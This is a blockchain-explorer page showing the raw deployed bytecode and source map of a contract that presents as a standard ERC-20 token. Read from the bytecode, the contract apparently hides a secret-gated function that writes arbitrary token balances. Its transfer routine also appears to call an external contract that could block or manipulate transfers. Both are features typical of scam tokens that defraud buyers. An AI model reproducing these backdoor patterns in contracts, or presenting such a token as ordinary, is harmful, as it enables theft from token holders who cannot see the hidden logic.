0x608060405234801561000f575f80fd5b50600436106100cb575f3560e01c806370a082311161008857806395d89b411161006357806395d89b41146101a4578063a9059cbb146101ac578063dd62ed3e146101bf578063f2fde38b146101f7575f80fd5b806370a0823114610159578063715018a6146101815780638da5cb5b14610189575f80fd5b806306fdde03146100cf578063095ea7b3146100ed57806309c450d01461011057806318160ddd1461012557806323b872dd14610137578063313ce5671461014a575b5f80fd5b6100d761020a565b6040516100e4919061088e565b60405180910390f35b6101006100fb3660046108c2565b61029a565b60405190151581526020016100e4565b61012361011e3660046108ea565b6102b3565b005b6003545b6040519081526020016100e4565b61010061014536600461095b565b610322565b604051600981526020016100e4565b610129610167366004610995565b6001600160a01b03165f9081526020819052604090205490565b610123610345565b6007546040516001600160a01b0390911681526020016100e4565b6100d7610358565b6101006101ba3660046108c2565b610367565b6101296101cd3660046109ae565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b610123610205366004610995565b610374565b606060058054610219906109df565b80601f0160208091040260200160405190810160405280929190818152602001828054610245906109df565b80156102905780601f1061026757610100808354040283529160200191610290565b820191905f5260205f20905b81548152906001019060200180831161027357829003601f168201915b5050505050905090565b5f336102a78185856103b6565b60019150505b92915050565b5f805f6102f185855f8181106102cb576102cb610a17565b90506020020135868660018181106102e5576102e5610a17565b905060200201356103c8565b92509250925082610303575050505050565b6020811561031a575f838152808252604090208290555b505050505050565b5f3361032f8582856104c1565b61033a85858561053c565b506001949350505050565b61034d610599565b6103565f6105c6565b565b606060068054610219906109df565b5f336102a781858561053c565b61037c610599565b6001600160a01b0381166103aa57604051631e4fbdf760e01b81525f60048201526024015b60405180910390fd5b6103b3816105c6565b50565b6103c38383836001610617565b505050565b5f805f803390505f600680546103dd906109df565b80601f0160208091040260200160405190810160405280929190818152602001828054610409906109df565b80156104545780601f1061042b57610100808354040283529160200191610454565b820191905f5260205f20905b81548152906001019060200180831161043757829003601f168201915b50505f808052600260209081527fac33ff75c19e70fe83507db0d683fd3465c996598dc972688b7ace676c89077b54604051969750919591945061049e9350879250869101610a2b565b60408051808303601f190181529190528051602090910120149895505050505050565b6001600160a01b038381165f908152600160209081526040808320938616835292905220545f198114610536578181101561052857604051637dc7a0d960e11b81526001600160a01b038416600482015260248101829052604481018390526064016103a1565b61053684848484035f610617565b50505050565b6001600160a01b03831661056557604051634b637e8f60e11b81525f60048201526024016103a1565b6001600160a01b03821661058e5760405163ec442f0560e01b81525f60048201526024016103a1565b6103c38383836106e9565b6007546001600160a01b031633146103565760405163118cdaa760e01b81523360048201526024016103a1565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0384166106405760405163e602df0560e01b81525f60048201526024016103a1565b6001600160a01b03831661066957604051634a1406b160e11b81525f60048201526024016103a1565b6001600160a01b038085165f908152600160209081526040808320938716835292905220829055801561053657826001600160a01b0316846001600160a01b03167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516106db91815260200190565b60405180910390a350505050565b6001600160a01b038316610713578060035f8282546107089190610a6a565b909155506107889050565b63829e060560e01b5f806107278684610814565b909250905081848110156107675760405163391434e360e21b81526001600160a01b038816600482015260248101829052604481018690526064016103a1565b6001600160a01b0387165f9081526020819052604090209085900390555050505b6001600160a01b0382166107a4576003805482900390556107c2565b6001600160a01b0382165f9081526020819052604090208054820190555b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161080791815260200190565b60405180910390a3505050565b5f805f806040518581528660048201525f60248201526020608082016044835f6004545af19150811561084957608081015192505b50610855826001610a7d565b969095509350505050565b5f81518084528060208401602086015e5f602082860101526020601f19601f83011685010191505092915050565b602081525f6108a06020830184610860565b9392505050565b80356001600160a01b03811681146108bd575f80fd5b919050565b5f80604083850312156108d3575f80fd5b6108dc836108a7565b946020939093013593505050565b5f80602083850312156108fb575f80fd5b823567ffffffffffffffff811115610911575f80fd5b8301601f81018513610921575f80fd5b803567ffffffffffffffff811115610937575f80fd5b8560208260051b840101111561094b575f80fd5b6020919091019590945092505050565b5f805f6060848603121561096d575f80fd5b610976846108a7565b9250610984602085016108a7565b929592945050506040919091013590565b5f602082840312156109a5575f80fd5b6108a0826108a7565b5f80604083850312156109bf575f80fd5b6109c8836108a7565b91506109d6602084016108a7565b90509250929050565b600181811c908216806109f357607f821691505b602082108103610a1157634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52603260045260245ffd5b6001600160a01b03831681526040602082018190525f90610a4e90830184610860565b949350505050565b634e487b7160e01b5f52601160045260245ffd5b808201808211156102ad576102ad610a56565b80820281158282048414176102ad576102ad610a5656fea2646970667358221220442b9805a02530e6d522a1b0185682438c80982e01b3ef36ba81927861be380164736f6c634300081a0033
Deployed Bytecode Sourcemap
26582:346:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15439:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17772:222;;;;;;:::i;:::-;;:::i;:::-;;;1181:14:1;;1174:22;1156:41;;1144:2;1129:18;17772:222:0;1016:187:1;25803:468:0;;;;;;:::i;:::-;;:::i;:::-;;16540:99;16619:12;;16540:99;;;1969:25:1;;;1957:2;1942:18;16540:99:0;1823:177:1;18572:283:0;;;;;;:::i;:::-;;:::i;16392:83::-;;;16466:1;2526:36:1;;2514:2;2499:18;16392:83:0;2384:184:1;16702:118:0;;;;;;:::i;:::-;-1:-1:-1;;;;;16794:18:0;16767:7;16794:18;;;;;;;;;;;;16702:118;9450:103;;;:::i;8775:87::-;8848:6;;8775:87;;-1:-1:-1;;;;;8848:6:0;;;2910:51:1;;2898:2;2883:18;8775:87:0;2764:203:1;15649:95:0;;;:::i;17025:182::-;;;;;;:::i;:::-;;:::i;17270:183::-;;;;;;:::i;:::-;-1:-1:-1;;;;;17418:18:0;;;17386:7;17418:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;17270:183;9708:220;;;;;;:::i;:::-;;:::i;15439:91::-;15484:13;15517:5;15510:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15439:91;:::o;17772:222::-;17872:4;7105:10;17933:31;7105:10;17949:7;17958:5;17933:8;:31::i;:::-;17982:4;17975:11;;;17772:222;;;;;:::o;25803:468::-;25865:9;25876:12;25890;25906:26;25918:3;;25922:1;25918:6;;;;;;;:::i;:::-;;;;;;;25925:3;;25929:1;25925:6;;;;;;;:::i;:::-;;;;;;;25906:11;:26::i;:::-;25864:68;;;;;;25948:4;25943:18;;25954:7;;;25803:468;;:::o;25943:18::-;26007:27;26051:11;;26048:205;;26117:1;26138:15;;;26171:19;;;26228:2;26215:16;;26208:30;;;26048:205;;25980:284;;;25803:468;;:::o;18572:283::-;18693:4;7105:10;18751:37;18767:4;7105:10;18782:5;18751:15;:37::i;:::-;18799:26;18809:4;18815:2;18819:5;18799:9;:26::i;:::-;-1:-1:-1;18843:4:0;;18572:283;-1:-1:-1;;;;18572:283:0:o;9450:103::-;8661:13;:11;:13::i;:::-;9515:30:::1;9542:1;9515:18;:30::i;:::-;9450:103::o:0;15649:95::-;15696:13;15729:7;15722:14;;;;;:::i;17025:182::-;17094:4;7105:10;17150:27;7105:10;17167:2;17171:5;17150:9;:27::i;9708:220::-;8661:13;:11;:13::i;:::-;-1:-1:-1;;;;;9793:22:0;::::1;9789:93;;9839:31;::::0;-1:-1:-1;;;9839:31:0;;9867:1:::1;9839:31;::::0;::::1;2910:51:1::0;2883:18;;9839:31:0::1;;;;;;;;9789:93;9892:28;9911:8;9892:18;:28::i;:::-;9708:220:::0;:::o;23399:164::-;23518:37;23527:5;23534:7;23543:5;23550:4;23518:8;:37::i;:::-;23399:164;;;:::o;26279:296::-;26349:4;26354:7;26362;26381:12;26396:10;26381:25;;26417:18;26438:7;26417:28;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;26456:9:0;26513:18;;;:6;:18;;;;;;;26486:22;26417:28;;-1:-1:-1;26456:9:0;;26513:18;;-1:-1:-1;26486:22:0;;-1:-1:-1;26497:4:0;;-1:-1:-1;26417:28:0;;26486:22;;:::i;:::-;;;;;;;-1:-1:-1;;26486:22:0;;;;;;26476:33;;26486:22;26476:33;;;;26468:63;;26279:296;-1:-1:-1;;;;;;26279:296:0:o;25192:603::-;-1:-1:-1;;;;;17418:18:0;;;25326:24;17418:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;-1:-1:-1;;25393:37:0;;25389:399;;25470:5;25451:16;:24;25447:214;;;25503:142;;-1:-1:-1;;;25503:142:0;;-1:-1:-1;;;;;4296:32:1;;25503:142:0;;;4278:51:1;4345:18;;;4338:34;;;4388:18;;;4381:34;;;4251:18;;25503:142:0;4076:345:1;25447:214:0;25704:57;25713:5;25720:7;25748:5;25729:16;:24;25755:5;25704:8;:57::i;:::-;25315:480;25192:603;;;:::o;19240:342::-;-1:-1:-1;;;;;19358:18:0;;19354:88;;19400:30;;-1:-1:-1;;;19400:30:0;;19427:1;19400:30;;;2910:51:1;2883:18;;19400:30:0;2764:203:1;19354:88:0;-1:-1:-1;;;;;19456:16:0;;19452:88;;19496:32;;-1:-1:-1;;;19496:32:0;;19525:1;19496:32;;;2910:51:1;2883:18;;19496:32:0;2764:203:1;19452:88:0;19550:24;19558:4;19564:2;19568:5;19550:7;:24::i;8940:166::-;8848:6;;-1:-1:-1;;;;;8848:6:0;7105:10;9000:23;8996:103;;9047:40;;-1:-1:-1;;;9047:40:0;;7105:10;9047:40;;;2910:51:1;2883:18;;9047:40:0;2764:203:1;10088:191:0;10181:6;;;-1:-1:-1;;;;;10198:17:0;;;-1:-1:-1;;;;;;10198:17:0;;;;;;;10231:40;;10181:6;;;10198:17;10181:6;;10231:40;;10162:16;;10231:40;10151:128;10088:191;:::o;24414:486::-;-1:-1:-1;;;;;24570:19:0;;24566:91;;24613:32;;-1:-1:-1;;;24613:32:0;;24642:1;24613:32;;;2910:51:1;2883:18;;24613:32:0;2764:203:1;24566:91:0;-1:-1:-1;;;;;24671:21:0;;24667:92;;24716:31;;-1:-1:-1;;;24716:31:0;;24744:1;24716:31;;;2910:51:1;2883:18;;24716:31:0;2764:203:1;24667:92:0;-1:-1:-1;;;;;24769:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;:35;;;24815:78;;;;24866:7;-1:-1:-1;;;;;24850:31:0;24859:5;-1:-1:-1;;;;;24850:31:0;;24875:5;24850:31;;;;1969:25:1;;1957:2;1942:18;;1823:177;24850:31:0;;;;;;;;24414:486;;;;:::o;19906:1261::-;-1:-1:-1;;;;;20030:18:0;;20026:644;;20184:5;20168:12;;:21;;;;;;;:::i;:::-;;;;-1:-1:-1;20026:644:0;;-1:-1:-1;20026:644:0;;-1:-1:-1;;;20222:10:0;;20292:18;20301:4;20235:18;20292:8;:18::i;:::-;20268:42;;-1:-1:-1;20268:42:0;-1:-1:-1;20268:42:0;20370:19;;;20366:117;;;20417:50;;-1:-1:-1;;;20417:50:0;;-1:-1:-1;;;;;4296:32:1;;20417:50:0;;;4278:51:1;4345:18;;;4338:34;;;4388:18;;;4381:34;;;4251:18;;20417:50:0;4076:345:1;20366:117:0;-1:-1:-1;;;;;20606:15:0;;:9;:15;;;;;;;;;;20624:19;;;;20606:37;;-1:-1:-1;;;20026:644:0;-1:-1:-1;;;;;20686:16:0;;20682:435;;20852:12;:21;;;;;;;20682:435;;;-1:-1:-1;;;;;21068:13:0;;:9;:13;;;;;;;;;;:22;;;;;;20682:435;21149:2;-1:-1:-1;;;;;21134:25:0;21143:4;-1:-1:-1;;;;;21134:25:0;;21153:5;21134:25;;;;1969::1;;1957:2;1942:18;;1823:177;21134:25:0;;;;;;;;19906:1261;;;:::o;21177:556::-;21237:7;21245:4;21262:19;21292:6;21360:4;21354:11;21395:3;21386:8;21379:20;21441:4;21434;21424:8;21420:19;21413:33;21488:1;21481:4;21471:8;21467:19;21460:30;21571:4;21565;21555:8;21551:19;21546:4;21537:8;21535:1;21526:7;21520:14;21514:5;21509:67;21504:72;;21593:1;21590:80;;;21649:4;21639:8;21635:19;21629:26;21614:41;;21590:80;-1:-1:-1;21699:23:0;:11;21714:7;21699:23;:::i;:::-;21691:34;21723:1;;-1:-1:-1;21177:556:0;-1:-1:-1;;;;21177:556:0:o;14:289:1:-;56:3;94:5;88:12;121:6;116:3;109:19;177:6;170:4;163:5;159:16;152:4;147:3;143:14;137:47;229:1;222:4;213:6;208:3;204:16;200:27;193:38;292:4;285:2;281:7;276:2;268:6;264:15;260:29;255:3;251:39;247:50;240:57;;;14:289;;;;:::o;308:220::-;457:2;446:9;439:21;420:4;477:45;518:2;507:9;503:18;495:6;477:45;:::i;:::-;469:53;308:220;-1:-1:-1;;;308:220:1:o;533:173::-;601:20;;-1:-1:-1;;;;;650:31:1;;640:42;;630:70;;696:1;693;686:12;630:70;533:173;;;:::o;711:300::-;779:6;787;840:2;828:9;819:7;815:23;811:32;808:52;;;856:1;853;846:12;808:52;879:29;898:9;879:29;:::i;:::-;869:39;977:2;962:18;;;;949:32;;-1:-1:-1;;;711:300:1:o;1208:610::-;1294:6;1302;1355:2;1343:9;1334:7;1330:23;1326:32;1323:52;;;1371:1;1368;1361:12;1323:52;1411:9;1398:23;1444:18;1436:6;1433:30;1430:50;;;1476:1;1473;1466:12;1430:50;1499:22;;1552:4;1544:13;;1540:27;-1:-1:-1;1530:55:1;;1581:1;1578;1571:12;1530:55;1621:2;1608:16;1647:18;1639:6;1636:30;1633:50;;;1679:1;1676;1669:12;1633:50;1732:7;1727:2;1717:6;1714:1;1710:14;1706:2;1702:23;1698:32;1695:45;1692:65;;;1753:1;1750;1743:12;1692:65;1784:2;1776:11;;;;;1806:6;;-1:-1:-1;1208:610:1;-1:-1:-1;;;1208:610:1:o;2005:374::-;2082:6;2090;2098;2151:2;2139:9;2130:7;2126:23;2122:32;2119:52;;;2167:1;2164;2157:12;2119:52;2190:29;2209:9;2190:29;:::i;:::-;2180:39;;2238:38;2272:2;2261:9;2257:18;2238:38;:::i;:::-;2005:374;;2228:48;;-1:-1:-1;;;2345:2:1;2330:18;;;;2317:32;;2005:374::o;2573:186::-;2632:6;2685:2;2673:9;2664:7;2660:23;2656:32;2653:52;;;2701:1;2698;2691:12;2653:52;2724:29;2743:9;2724:29;:::i;2972:260::-;3040:6;3048;3101:2;3089:9;3080:7;3076:23;3072:32;3069:52;;;3117:1;3114;3107:12;3069:52;3140:29;3159:9;3140:29;:::i;:::-;3130:39;;3188:38;3222:2;3211:9;3207:18;3188:38;:::i;:::-;3178:48;;2972:260;;;;;:::o;3237:380::-;3316:1;3312:12;;;;3359;;;3380:61;;3434:4;3426:6;3422:17;3412:27;;3380:61;3487:2;3479:6;3476:14;3456:18;3453:38;3450:161;;3533:10;3528:3;3524:20;3521:1;3514:31;3568:4;3565:1;3558:15;3596:4;3593:1;3586:15;3450:161;;3237:380;;;:::o;3622:127::-;3683:10;3678:3;3674:20;3671:1;3664:31;3714:4;3711:1;3704:15;3738:4;3735:1;3728:15;3754:317;-1:-1:-1;;;;;3931:32:1;;3913:51;;4000:2;3995;3980:18;;3973:30;;;-1:-1:-1;;4020:45:1;;4046:18;;4038:6;4020:45;:::i;:::-;4012:53;3754:317;-1:-1:-1;;;;3754:317:1:o;4426:127::-;4487:10;4482:3;4478:20;4475:1;4468:31;4518:4;4515:1;4508:15;4542:4;4539:1;4532:15;4558:125;4623:9;;;4644:10;;;4641:36;;;4657:18;;:::i;4688:168::-;4761:9;;;4792;;4809:15;;;4803:22;;4789:37;4779:71;;4830:18;;:::i
Swarm Source
ipfs://442b9805a02530e6d522a1b0185682438c80982e01b3ef36ba81927861be3801
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 35 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.